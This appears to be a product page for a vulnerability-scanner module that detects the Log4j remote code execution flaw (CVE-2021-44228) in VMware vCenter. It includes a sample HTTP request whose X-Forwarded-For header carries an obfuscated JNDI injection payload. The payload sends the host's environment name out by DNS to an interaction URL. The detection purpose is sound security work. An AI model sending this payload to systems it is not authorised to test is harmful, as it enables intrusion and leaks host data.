Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "VMware VCenter - Remote Code Execution (Apache Log4j)" module is designed to detect the vulnerability in VMware VCenter that allows remote code execution through the Apache Log4j framework. This vulnerability, identified as CVE-2021-44228, has a critical severity level and can be exploited by attackers to execute malware and obtain sensitive information.
If successfully exploited, this vulnerability can have severe consequences. Attackers can execute arbitrary code on the affected system, leading to potential data breaches, unauthorized access, and system compromise. It is crucial to address this vulnerability promptly to prevent any potential damage.
The module works by sending HTTP requests to the target VMware VCenter system and applying specific matching conditions to identify the presence of the vulnerability. One example of an HTTP request used by the module is:
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <Hostname>
X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{%InteractionURL%}}
The module uses two matching conditions to determine if the vulnerability is present:
- The first condition checks for the presence of the "dns" protocol in the interaction. - The second condition uses a regular expression to match a specific pattern in the interaction request.If both conditions are met, the module reports the vulnerability, indicating the need for immediate action to mitigate the risk.